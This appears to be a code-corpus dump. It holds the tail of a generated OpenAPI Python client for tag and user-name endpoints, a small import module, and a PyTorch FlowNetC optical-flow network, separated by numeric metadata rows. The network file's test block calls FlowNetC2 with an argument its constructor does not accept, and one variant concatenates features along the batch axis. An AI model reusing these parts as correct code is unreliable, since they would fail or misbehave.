(connection, read) timeouts.
:return: tuple(ResponseTagResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_tag_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/tag/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseTagResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag_view(self, **kwargs): # noqa: E501
"""Get tag list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseTagListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_view_with_http_info(**kwargs) # noqa: E501
def get_tag_view_with_http_info(self, **kwargs): # noqa: E501
"""Get tag list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseTagListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['limit', 'page', 'sort', 'order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'order' in local_var_params:
query_params.append(('order', local_var_params['order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/tag', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseTagListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_name_update_view(self, uuid, **kwargs): # noqa: E501
"""Get user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_user_name_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_user_name_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_user_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_name_view(self, **kwargs): # noqa: E501
"""Get user name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_user_name_view_with_http_info(**kwargs) # noqa: E501
def get_user_name_view_with_http_info(self, **kwargs): # noqa: E501
"""Get user name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_name_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['limit', 'page', 'sort', 'order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'order' in local_var_params:
query_params.append(('order', local_var_params['order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_user_name_view(self, payload, **kwargs): # noqa: E501
"""Create new user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_user_name_view(payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param UserNameAdd payload: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.post_user_name_view_with_http_info(payload, **kwargs) # noqa: E501
def post_user_name_view_with_http_info(self, payload, **kwargs): # noqa: E501
"""Create new user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_user_name_view_with_http_info(payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param UserNameAdd payload: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payload'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method post_user_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'payload' is set
if ('payload' not in local_var_params or
local_var_params['payload'] is None):
raise ApiValueError("Missing the required parameter `payload` when calling `post_user_name_view`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'payload' in local_var_params:
body_params = local_var_params['payload']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def put_user_name_update_view(self, uuid, payload, **kwargs): # noqa: E501
"""Update user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_user_name_update_view(uuid, payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param UserNameUpdate payload: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseUserNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.put_user_name_update_view_with_http_info(uuid, payload, **kwargs) # noqa: E501
def put_user_name_update_view_with_http_info(self, uuid, payload, **kwargs): # noqa: E501
"""Update user name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_user_name_update_view_with_http_info(uuid, payload, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param UserNameUpdate payload: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseUserNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid', 'payload'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method put_user_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `put_user_name_update_view`") # noqa: E501
# verify the required parameter 'payload' is set
if ('payload' not in local_var_params or
local_var_params['payload'] is None):
raise ApiValueError("Missing the required parameter `payload` when calling `put_user_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'payload' in local_var_params:
body_params = local_var_params['payload']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name/{uuid}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseUserNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.036873
| 130
| 0.59651
| 6,717
| 59,714
| 5.040941
| 0.030966
| 0.043946
| 0.066982
| 0.031896
| 0.964619
| 0.962345
| 0.961164
| 0.956999
| 0.954784
| 0.949882
| 0
| 0.01259
| 0.325636
| 59,714
| 1,355
| 131
| 44.069373
| 0.828255
| 0.452021
| 0
| 0.82459
| 1
| 0
| 0.173033
| 0.055377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040984
| false
| 0
| 0.008197
| 0
| 0.090164
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f8ae575619677af7c3ad6715725d756406b87f3e
| 140
|
py
|
Python
|
sinling/core/__init__.py
|
ysenarath/sinling
|
34b4e3cecc8026f21d2845653ddb935c7705fea4
|
[
"Apache-2.0"
] | 31
|
2019-06-19T09:26:28.000Z
|
2022-01-04T02:08:59.000Z
|
sinling/core/__init__.py
|
ysenarath/sinling
|
34b4e3cecc8026f21d2845653ddb935c7705fea4
|
[
"Apache-2.0"
] | 6
|
2020-04-18T07:15:53.000Z
|
2021-02-09T01:41:22.000Z
|
sinling/core/__init__.py
|
ysenarath/sinling
|
34b4e3cecc8026f21d2845653ddb935c7705fea4
|
[
"Apache-2.0"
] | 13
|
2019-11-06T03:10:05.000Z
|
2021-12-06T02:19:51.000Z
|
from sinling.core.joiner import *
from sinling.core.stemmer import *
from sinling.core.tokenizer import *
from sinling.core.tagger import *
| 28
| 36
| 0.8
| 20
| 140
| 5.6
| 0.4
| 0.392857
| 0.535714
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 140
| 4
| 37
| 35
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f8c6d1db23e04b76c93897503b2c1f149539aa43
| 15,722
|
py
|
Python
|
networks/flownetc.py
|
naivete5656/BFP
|
74c5604a9ba4eaa3ec3e2c76ef5e1282d7d10f18
|
[
"MIT"
] | 8
|
2020-07-31T15:20:01.000Z
|
2021-09-18T08:42:07.000Z
|
networks/flownetc.py
|
naivete5656/BFP
|
74c5604a9ba4eaa3ec3e2c76ef5e1282d7d10f18
|
[
"MIT"
] | null | null | null |
networks/flownetc.py
|
naivete5656/BFP
|
74c5604a9ba4eaa3ec3e2c76ef5e1282d7d10f18
|
[
"MIT"
] | 5
|
2020-10-04T02:02:13.000Z
|
2021-11-14T23:37:08.000Z
|
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.nn.init import kaiming_normal_, constant_
import math
import numpy as np
from .util import conv, predict_flow, deconv, crop_like, correlate
"Parameter count , 39,175,298 "
class FlowNetC(nn.Module):
expansion = 1
def __init__(self, batchNorm=True):
super(FlowNetC, self).__init__()
self.batchNorm = batchNorm
self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=7, stride=2)
self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)
self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)
self.conv_redir = conv(self.batchNorm, 256, 32, kernel_size=1, stride=1)
self.conv3_1 = conv(self.batchNorm, 473, 256)
self.conv4 = conv(self.batchNorm, 256, 512, stride=2)
self.conv4_1 = conv(self.batchNorm, 512, 512)
self.conv5 = conv(self.batchNorm, 512, 512, stride=2)
self.conv5_1 = conv(self.batchNorm, 512, 512)
self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)
self.conv6_1 = conv(self.batchNorm, 1024, 1024)
self.deconv5 = deconv(1024, 512)
self.deconv4 = deconv(1026, 256)
self.deconv3 = deconv(770, 128)
self.deconv2 = deconv(386, 64)
self.predict_flow6 = predict_flow(1024)
self.predict_flow5 = predict_flow(1026)
self.predict_flow4 = predict_flow(770)
self.predict_flow3 = predict_flow(386)
self.predict_flow2 = predict_flow(194)
self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
kaiming_normal_(m.weight, 0.1)
if m.bias is not None:
constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
constant_(m.weight, 1)
constant_(m.bias, 0)
def forward(self, x):
x1 = x[:, :1]
x2 = x[:, 1:]
out_conv1a = self.conv1(x1)
out_conv2a = self.conv2(out_conv1a)
out_conv3a = self.conv3(out_conv2a)
out_conv1b = self.conv1(x2)
out_conv2b = self.conv2(out_conv1b)
out_conv3b = self.conv3(out_conv2b)
out_conv_redir = self.conv_redir(out_conv3a)
out_correlation = correlate(out_conv3a, out_conv3b)
in_conv3_1 = torch.cat([out_conv_redir, out_correlation], dim=1)
out_conv3 = self.conv3_1(in_conv3_1)
out_conv4 = self.conv4_1(self.conv4(out_conv3))
out_conv5 = self.conv5_1(self.conv5(out_conv4))
out_conv6 = self.conv6_1(self.conv6(out_conv5))
flow6 = self.predict_flow6(out_conv6)
flow6_up = crop_like(self.upsampled_flow6_to_5(flow6), out_conv5)
out_deconv5 = crop_like(self.deconv5(out_conv6), out_conv5)
concat5 = torch.cat((out_conv5, out_deconv5, flow6_up), 1)
flow5 = self.predict_flow5(concat5)
flow5_up = crop_like(self.upsampled_flow5_to_4(flow5), out_conv4)
out_deconv4 = crop_like(self.deconv4(concat5), out_conv4)
concat4 = torch.cat((out_conv4, out_deconv4, flow5_up), 1)
flow4 = self.predict_flow4(concat4)
flow4_up = crop_like(self.upsampled_flow4_to_3(flow4), out_conv3)
out_deconv3 = crop_like(self.deconv3(concat4), out_conv3)
concat3 = torch.cat((out_conv3, out_deconv3, flow4_up), 1)
flow3 = self.predict_flow3(concat3)
flow3_up = crop_like(self.upsampled_flow3_to_2(flow3), out_conv2a)
out_deconv2 = crop_like(self.deconv2(concat3), out_conv2a)
concat2 = torch.cat((out_conv2a, out_deconv2, flow3_up), 1)
flow2 = self.predict_flow2(concat2)
if self.training:
return flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6
else:
return flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6
def weight_parameters(self):
return [param for name, param in self.named_parameters() if "weight" in name]
def bias_parameters(self):
return [param for name, param in self.named_parameters() if "bias" in name]
class FlowNetC2(nn.Module):
def __init__(self):
super().__init__()
self.flownetc = FlowNetC()
self.upsampled_flow2_to_1 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.upsampled_flow1_to_0 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.predict_flow1 = predict_flow(130)
self.predict_flow = predict_flow(66)
self.deconv1 = deconv(194, 64)
self.deconv = deconv(130, 64)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
flow2, concat2, out_conv1a, flow3, flow4, flow5, flow6 = self.flownetc(x)
flow2_up = self.upsampled_flow2_to_1(flow2)
out_deconv1 = self.deconv1(concat2)
concat1 = torch.cat((out_conv1a, out_deconv1, flow2_up), 1)
flow1 = self.predict_flow1(concat1)
flow_up = self.upsampled_flow1_to_0(flow1)
out_deconv = self.deconv(concat1)
concat0 = torch.cat((out_deconv, flow_up), 1)
flow = self.predict_flow(concat0)
# flow = self.sigmoid(flow)
return flow, flow1, flow2, flow3, flow4, flow5, flow6
class FlowNetCA(nn.Module):
expansion = 1
def __init__(self, batchNorm=True):
super().__init__()
self.batchNorm = batchNorm
self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=7, stride=2)
self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)
self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)
self.conv_redir = conv(self.batchNorm, 256, 32, kernel_size=1, stride=1)
self.conv3_1 = conv(self.batchNorm, 473, 256)
self.conv4 = conv(self.batchNorm, 256, 512, stride=2)
self.conv4_1 = conv(self.batchNorm, 512, 512)
self.conv5 = conv(self.batchNorm, 512, 512, stride=2)
self.conv5_1 = conv(self.batchNorm, 512, 512)
self.conv6 = conv(self.batchNorm, 512, 1024, stride=2)
self.conv6_1 = conv(self.batchNorm, 1024, 1024)
self.deconv5 = deconv(1024, 512)
self.deconv4 = deconv(1026, 256)
self.deconv3 = deconv(770, 128)
self.deconv2 = deconv(386, 64)
self.predict_flow6 = predict_flow(1024)
self.predict_flow5 = predict_flow(1026)
self.predict_flow4 = predict_flow(770)
self.predict_flow3 = predict_flow(386)
self.predict_flow2 = predict_flow(194)
self.upsampled_flow6_to_5 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow5_to_4 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow4_to_3 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow3_to_2 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=False)
self.upsampled_flow2_to_1 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.upsampled_flow1_to_0 = nn.ConvTranspose2d(2, 2, 4, 2, 1, bias=True)
self.predict_flow1 = predict_flow(130)
self.predict_flow = predict_flow(66)
self.deconv1 = deconv(194, 64)
self.deconv = deconv(130, 64)
self.sigmoid = nn.Sigmoid()
for m in self.modules():
if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
kaiming_normal_(m.weight, 0.1)
if m.bias is not None:
constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
constant_(m.weight, 1)
constant_(m.bias, 0)
def forward(self, x):
x1 = x[:, :1]
x2 = x[:, 1:]
out_conv1a = self.conv1(x1)
out_conv2a = self.conv2(out_conv1a)
out_conv3a = self.conv3(out_conv2a)
out_conv1b = self.conv1(x2)
out_conv2b = self.conv2(out_conv1b)
out_conv3b = self.conv3(out_conv2b)
out_conv1 = torch.cat([out_conv1a, out_conv1b])
out_conv2 = torch.cat([out_conv2a, out_conv2b])
out_conv3 = torch.cat([out_conv3a, out_conv3b])
out_conv_redir = self.conv_redir(out_conv3a)
out_correlation = correlate(out_conv3a, out_conv3b)
in_conv3_1 = torch.cat([out_conv_redir, out_correlation], dim=1)
out_conv3 = self.conv3_1(in_conv3_1)
out_conv4 = self.conv4_1(self.conv4(out_conv3))
out_conv5 = self.conv5_1(self.conv5(out_conv4))
out_conv6 = self.conv6_1(self.conv6(out_conv5))
flow6 = self.predict_flow6(out_conv6)
flow6_up = crop_like(self.upsampled_flow6_to_5(flow6), out_conv5)
out_deconv5 = crop_like(self.deconv5(out_conv6), out_conv5)
concat5 = torch.cat((out_conv5, out_deconv5, flow6_up), 1)
flow5 = self.predict_flow5(concat5)
flow5_up = crop_like(self.upsampled_flow5_to_4(flow5), out_conv4)
out_deconv4 = crop_like(self.deconv4(concat5), out_conv4)
concat4 = torch.cat((out_conv4, out_deconv4, flow5_up), 1)
flow4 = self.predict_flow4(concat4)
flow4_up = crop_like(self.upsampled_flow4_to_3(flow4), out_conv3)
out_deconv3 = crop_like(self.deconv3(concat4), out_conv3)
concat3 = torch.cat((out_conv3, out_deconv3, flow4_up), 1)
flow3 = self.predict_flow3(concat3)
flow3_up = crop_like(self.upsampled_flow3_to_2(flow3), out_conv2a)
out_deconv2 = crop_like(self.deconv2(concat3), out_conv2)
concat2 = torch.cat((out_conv2, out_deconv2, flow3_up), 1)
flow2 = self.predict_flow2(concat2)
flow2_up = self.upsampled_flow2_to_1(flow2)
out_deconv1 = crop_like(self.deconv1(concat2), out_conv1)
concat1 = torch.cat((out_conv1, out_deconv1, flow2_up), 1)
flow1 = self.predict_flow1(concat1)
flow_up = self.upsampled_flow1_to_0(flow1)
out_deconv = self.deconv(concat1)
concat0 = torch.cat((out_deconv, flow_up), 1)
flow = self.predict_flow(concat0)
return flow, flow1, flow2, flow3, flow4, flow5, flow6
def weight_parameters(self):
return [param for name, param in self.named_parameters() if "weight" in name]
def bias_parameters(self):
return [param for name, param in self.named_parameters() if "bias" in name]
if __name__ == "__main__":
import argparse
args = argparse.ArgumentParser()
args = args.parse_args()
args.fp16 = False
model = FlowNetC2(args)
x = torch.randn(10, 2, 256, 256)
pred = model(x)
# class FlowNetC(nn.Module):
# def __init__(self, args, batchNorm=True, div_flow=20):
# super(FlowNetC, self).__init__()
# self.batchNorm = batchNorm
# self.div_flow = div_flow
# self.conv1 = conv(self.batchNorm, 1, 64, kernel_size=7, stride=2)
# self.conv2 = conv(self.batchNorm, 64, 128, kernel_size=5, stride=2)
# self.conv3 = conv(self.batchNorm, 128, 256, kernel_size=5, stride=2)
# self.conv_redir = conv(self.batchNorm, 256, 32, kernel_size=1, stride=1)
# if args.fp16:
# self.corr = nn.Sequential(
# tofp32(),
# Correlation(
# pad_size=20,
# kernel_size=1,
# max_displacement=20,
# stride1=1,
# stride2=2,
# corr_multiply=1,
# ),
# tofp16(),
# )
# else:
# self.corr = Correlation(
